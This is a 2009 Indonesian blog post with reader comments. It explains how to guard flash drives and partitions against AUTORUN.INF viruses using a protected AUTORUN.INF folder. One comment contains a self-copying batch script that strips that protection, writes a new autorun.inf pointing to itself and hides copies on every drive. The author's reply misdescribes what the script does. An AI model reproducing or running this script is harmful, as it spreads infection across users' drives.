Tips Mencegah Flash Disk & Hard Disk tertular virus

March 29, 2009 at 1:07 am 17 comments


virus-flashdisk
Banyak virus yang menular melalui script yang otomatis di-eksekusi (dijalankan) di Windows via file AUTORUN.INF.  Mungkin sebagian dari anda masih belum memahami bagaimana file AUTORUN.INF bisa tertular virus.

File AUTORUN.INF, adalah file peng-eksekusi secara otomatis dalam suatu media penyimpanan, seperti hardisk, flashdisk, disket. Misal di dalam harddisk ada beberapa partisi, misal :

  • Partisi C:\ (system windows xp)
  • partisi D:\ (penyimpanan data-data kita)
  • dan partisi lainnya

Secara default, file AUTORUN.INF di directory C:\ telah tersedia, tetapi  tidak ada isi (script/kode program) yang terkandung dalam file AUTORUN.INF.

“Nah sudah otomatis file AUTORUN.INF yg terdapat di partisi C:\ akan mudah tertular virus”

“Sekarang bagaimana dengan flashdisk???”

Secara default (setelah flashdisk tersebut di format), tidak ada file ataupun folder-folder di dalam flashdisk, tetapi jika flashdisk tersebut di hubungkan ke komputer yang telah terjangkit virus, tidak menutup kemungkinan flashdisk tersebut akan tertular virus.

*Catatan:

“Virus yang menular ke flashdisk ataupun ke hardisk melalui komputer/laptop, biasanya melalui setting AUTORUN/AUTOPLAY yang jalan secara otomatis di dalam Windows XP. Setting-an tersebut bisa kita non-aktifkan menggunakan TweakUI ataupun melalui gpedit.msc (bisa dilihat disini untuk tutorialnya)

*Kesimpulan:

“File AUTORUN.INF, merupakan file yang di-eksekusi secara otomatis jika fungsi AUTOPLAY/AUTORUN berjalan. Didalam file AUTORUN.INF yang sudah tertular, terdapat beberapa skrip kode jahat untuk menularkan/menyebarkan virus-virus. Jenis penularan/penyebarannya tergantung dari virus-virus tersebut.”

***

Nah, dari penjelasan diatas,anda pasti sudah memahami sedikit tentang file AUTORUN.INF.

Sebagian besar virus/trojan yang menggunakan AUTORUN.INF sebagai vektor penyebaran akan mati kutu jika kita telah memodifikasi flashdisk kita, jika kita menggunakan komputer-komputer/laptop-laptop lain yang fungsi AUTOPLAY/AUTORUN-nya masih berjalan.

Caranya sederhana:

  1. Di root directory dari semua partisi dan flash disk mu, buat sebuah folder bernama AUTORUN.INF.
  2. Ubah atribut folder ini menjadi “Read Only” dan “Hidden”. Kalau perlu, “System” sekalian.
    Mengapa trik ini bisa jalan? Karena Windows tidak membolehkan pembuatan file yang bernama sama dengan nama folder. Selain itu, cara mendelete folder sangat berbeda dengan cara mendelete file. Sebagian besar virus/trojan yang menular menggunakan AUTORUN.INF tidak bisa menangani hal ini.😉

Jadi mustinya, metode ini menolong mencegah penularan.

Langkah OPTIONAL (OPTIONAL) Biar lebih manjur lagi, ikutin tambahan langkah2 berikut:

  1. Dalam folder AUTORUN.INF tersebut, buat 1 (satu) atau 2 (dua) file .txt
  2. Rename file .txt tersebut, ganti filenamenya jadi mengandung 2-3 huruf CJK (Chinese-Japanese-Korea) Gunakan saja Character Map dengan font Arial Unicode atau MingLiU atau Batang atau Gulim atau Gungsuh atau… pokoknya font yang mengandung huruf CJK

Keberadaan file dalam folder tersebut menjamin folder tersebut tidak bisa dihapus. Huruf CJK akan mempersulit pembuat virus yang mengandalkan VBScript karena VBScript tidak support Unicode.

Tahap 0:

  1. Download dulu file SETFATR.ZIP dari situs ini:
    http://www.programmersheaven.com
  2. Buka SETFATR.ZIP, copy file SETFATR.EXE ke c:

Tahap I (menggunakan command prompt):

  1. Start > Run > cmd
  2. x:
    (x: adalah drive letter buat flash disk kamu)
  3. md autorun.inf
    (membuat folder autorun.inf)
  4. cd autorun.inf
    (masuk ke folder autorun.inf)
  5. echo Jangan dihapus! > 1.txt
    (membuat file 1.txt)
  6. echo Jangan dihapus! > 2.txt
  7. JANGAN ditutup Command Prompt nya, lanjut ke Tahap II

Tahap II:

  1. Buka Character Map (ada di Accessories > System)
  2. Pilih salah satu font CJK, seperti Arial Unicode, Batang, Gulim, Gungsuh, MingLiU, atau yang lainnya
  3. Cari huruf CJK, double click
  4. Cari huruf CJK lainnya, double click
  5. Klik copy
  6. Buka Windows Explorer (bukan Internet Explorer yah!)
  7. Masuk ke flash disk kamu
  8. Masuk ke folder autorun.inf
  9. Klik pada 1.txt, tekan F2
  10. Tekan Home
  11. Tekan Ctrl-V
  12. Tekan Enter
  13. Kembali ke Character Map
  14. Hapus kedua huruf CJK di kotak “Characters to Copy”
  15. Pilih huruf CJK lain, double click
  16. Pilih huruf CJK lain lagi, double click
  17. Kembali ke Windows Explorer
  18. Klik pada 2.txt, tekan F2
  19. Tekan Home
  20. Tekan Ctrl-V
  21. Tekan Enter
  22. TUTUP Windows Explorer nya

Tahap III:

  1. Kembali ke Command Prompt
  2. cd\
  3. c:setfatr autorun.inf RSH
    (Hati-hati! RSH harus pakai huruf besar!)

Nah, sekarang kalau dilihat dari Windows Explorer, kalau opsi “Hide protected system files” tidak dinyalakan, folder AUTORUN.INF juga tidak terlihat. Tapi bisa dicek keberadaannya:

Tahap Pengecekan:

  • Copy file AUTORUN.INF ke root dari flash disk (CD-CD installer biasanya punya) — atau –
  • Copy file apa saja ke root dari flash disk, lalu coba rename jadi autorun.inf Semestinya, proses pencopyan atau rename ini akan gagal, dengan pesan error.

m048
[Hehehe mudah-mudahan gak ribet, pelan2 aja ya mencobanya…😉, sukses…😆 ]

Sumber : portal.telkomspeedy.com



» Kembali Ke Halaman Depan

Bookmark and Share

Entry filed under: Ilmu Komputer, Keamanan Komputer, Windows XP. Tags: , , , , , , , , , , , , .

Islamic Widget – Alhabib Islam Widget Kata Orang, D’Masiv adalah Plagiat, Benarkah?

17 Comments Add your own

  • 1. Herman S.Y  |  April 7, 2009 at 6:00 pm

    PERTAMAX….😛

    Reply
  • 2. riadyawan  |  April 15, 2009 at 7:09 am

    tips yang keren… boleh dicoba lah…

    BeDeWe kq blog punya mas herman ada icon unik di bagian kanan bawah… gimana caranya mas???

    itu bukan javascript kan??? kan di blog wordpress g’ ngijinin pemakaian javascript…

    duh jadi pingin nie… ^^

    Reply
    • 3. Herman S.Y  |  April 17, 2009 at 11:16 pm

      @riadyawan
      Thanx…
      Itu cuma script HTML aja kok…
      ini kode HTML-nya:

      <div style="position:fixed;bottom:0;right:0;color:#9933CC;">#1<img title="#2" src="#3" /></div>
      


      Yg ini diganti ya:
      #1 = kalimat text
      #2 = nama gambar
      #3 = sumber file gambar

      [Widget : text]
      SuKsEs Yaw…😆

      Reply
  • 4. MANOHARA  |  June 25, 2009 at 9:03 pm

    Udah pernah liat script batch seperti ini :
    @echo off
    set auto=%random%
    for %%a in (C D E F G H I J K L M) do if exist %%a:\ (
    cacls %%a:\autorun.inf /p everyone:f /e
    rd /s /q %%a:\autorun.inf
    del /f /a /q %%a:\autorun.inf
    echo [autorun]>%%a:\autorun.inf
    echo open=%auto%.bat>>%%a:\autorun.inf
    echo shellexecute=%auto%.bat>>%%a:\autorun.inf
    copy “%0” “%%a:\%auto%.bat”
    attrib +s +h +r %%a:\autorun.inf
    attrib +s +h +r “%%a:\%auto%.bat”)

    Reply
    • 5. Herman S.Y  |  June 26, 2009 at 12:49 am

      @MANOHARA

      Ehm… saya baru liat coz situ yg nunjukin scriptnya..😆
      Kalau diliat2 sih, kayaknya tuh script berfungsi untuk ngilangin semua data di drive (C D E F G H I J K L M), coz ada script:
      – rd /s /q %%a:\autorun.inf
      rd = remove directory/folder, dibantu fungsi autorun.inf
      – del /f /a /q %%a:\autorun.inf
      del = menghapus file, dibantu fungsi autorun.inf

      Kesemua script tsb akan tersimpan di file auto%.bat = “autoexec.bat”.
      Nah filenya tersimpan di root c:\
      Setiap login, sudah pasti sistem operasi windows akan mendeteksi file autorunnya yg berada di root c:\

      bagaimana file autoexec.bat bisa tertular karena script tsb, itu karena proses copy dari (biasanya):
      – flashdisk
      – disket
      – cdrom

      scriptnya yaitu : “copy “%0″ “%%a:\%auto%.bat””

      Nah, cara pencegahannya, gunakanlah cara “Tips Mencegah Flashdisk & Harddisk Tertular Virus”… Simple kok…😉

      Reply
  • 6. MANOHARA  |  June 26, 2009 at 8:55 am

    Emang flashdisk kamu pake trik folder autorun ya? kalo iya, coba kamu jalankan script diatas, dan proteksi folder autorun anda tak lagi berguna

    Reply
    • 7. Herman S.Y  |  June 26, 2009 at 11:40 pm

      @MANOHARA

      Flashdisk saya sih ga pake trik proteksi apapun. Yg saya pake cuma proteksi dari sitem operasi windows, salah satunya ya men-disable autorun. ada lagi cara yg lumayan intermediate yaitu make deepfreeze, dan ada lagi yg cara advance..😆

      So, daripada make antivirus yg berat2 bikin OS lemot, ya lebih efisien memakai trik tersebut…😆

      Reply
  • 8. MANOHARA  |  June 26, 2009 at 9:03 am

    Sebenarnya fungsi script diatas adl mencari ke semua drive, menghapus “paksa” file dan folder autorun.inf. kemudian membuat autorun.inf baru serta mengaktifkannya pada shell double click pd drive

    Reply
    • 9. Herman S.Y  |  June 26, 2009 at 11:38 pm

      @MANOHARA

      Ehm.. menghapus paksa ya… Insya Allah nanti saya jalankan script tsb, dan melihat hasilnya. Thanx for u’r Info…😆

      Reply
  • 10. dins  |  June 28, 2009 at 10:20 am

    Tipsnya bisa berhasil mas…

    Salam kenal mas, blog sudah saya add mas, mohon di linkback. Terimakasih.

    Reply
    • 11. Herman S.Y  |  June 28, 2009 at 10:36 pm

      @dins

      Salam kenal juga… Ok. Insya Allah saya add.. Terima kasih juga dah mampir… :lol.. Salam kenal juga…

      Reply
  • 12. ari  |  September 21, 2009 at 12:53 am

    eh virus autorun.inf dah nyebar ni dkomp gw..ampe gw mau buka regedit mlah shut down, buka taks manager gak bsa, komp gw adminnya kekunci tp udah bisa lg c cz ada admin lg gw..pke AVG mlah heal doank tp msh ada..emm jd gmana ni?trus kan kalo virus bukan autorun.inf doank.itu jg setup nya..yg system.exe nya gmana?apa buat folder namanya system.exe jg?malah gw pke folder autorun.inf mlah tetep jdnya kyk gni G:\autorun.inf\autorun.inf
    jd gmana?

    Reply
    • 13. Herman S.Y  |  September 21, 2009 at 11:54 am

      @ari

      sebenernya, file autorun.inf itu bukan virus, melainkan file trigger (pengeksekusi) dari virusnya. Jika komputer sebelumnya telah di install, kemudian fungsi autoplay dari windows tidak di set “Turn off” untuk All drive, maka fungsi autoplay akan berjalan, misal memasukkan flashdisk yg sudah terinfeksi virus. Maka pc/laptop pun akan tertular virus.

      Maka dari itu, metode penjelasan diatas akan lebih baik dilakukan jika pc/laptop telah diinstall ulang. Kemudian di setting semua fungsi, misalkan:
      – gpedit.msc –> mematikan fungsi autoplay
      – Membuat folder “autorun.inf” dan membuat file apa saja di dalam folder “autorun.inf” tsb dan menset semuanya menjadi read only.

      Saya pribadi telah mencobanya di laptop saya, dan sampai sekarang laptop saya tidak pernah terjangkit virus yg berasal dari trigger file “autorun.inf”.😀

      Jika pc/laptop telah tertular, mau ga mau di scan menggunakan antivirus yg bagus, tetapi jika malas men-scan, ya pake cara paling wahid aja, yaitu format dan install ulang.. :-p

      nb: oiya, sebaiknya di upgrade ke SP3, bisa dilakukan melalui windows update. ^_^

      Reply
  • 14. syifa  |  January 21, 2010 at 9:41 pm

    mas salam kenal …..saya minta tolong ada skrip pembobol blok data yg di kunci ama paswod gak kalo ada minta tolong mas apa skrip ya

    Reply
    • 15. Herman S.Y  |  January 25, 2010 at 6:05 pm

      @syifa:
      Salam kenal juga.
      skrip pembobol sih banyak, pertanyaannya, skrip pembobol blok data untuk apa?
      Hehehhe pengertian data itu luas uy…😀
      Kalo gua sih, misal FD terkena virus or di blok password or apa lah, hehheheh cara paling mutakhir & ajib yaitu Re-Format…. :-p

      Reply
  • 16. baca manga  |  July 17, 2010 at 10:05 pm

    tukar link/ banner, pasang link ku dulu kalo sudah konfirmasi ke blog ku😀

    Reply
  • 17. ahmadriyadhmz  |  December 9, 2010 at 4:13 pm

    good info, keep posting bro..!!
    visit my blog : http://www.ahmadriyadhmz.wordpress.com

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed


Assalammu’alaikum…

"Raihlah ilmu yg bermanfaat walaupun hanya 1 kalimat..."

benderaindonesia

Sponsor

Toko Spare Part Mercedes Benz (Mercy) Murah

Toko Spare Part Mercy Murah (Bus & Truk) - Bogor - UD. Utari Jaya
 

Tukang Taman Murah & Profesional

tukang taman murah-jasa tukang taman-kolam-gazebo jakarta,bogor,depok,tangerang,bekasi Tukang Taman Bogor - Twitter
Peta

chat me on Y!M

WebLogz Stats

  • 181,652 visitors

Jejak Pengunjung

IP

WebLogz Traffic

free counters

Teng-Qyu

Makasih banyak ya dah mampir ke blog-ku, Mudah-mudahan ga bosen ya... (^o^) ...

friendly-blogger-award-2009
Thanx to Mas Won Bin
["Wong Bingungan"]



© Dec 2008-2016
Herman S.Y Indonesia

Jng Lupa Commentnya ya... biggreen

%d bloggers like this: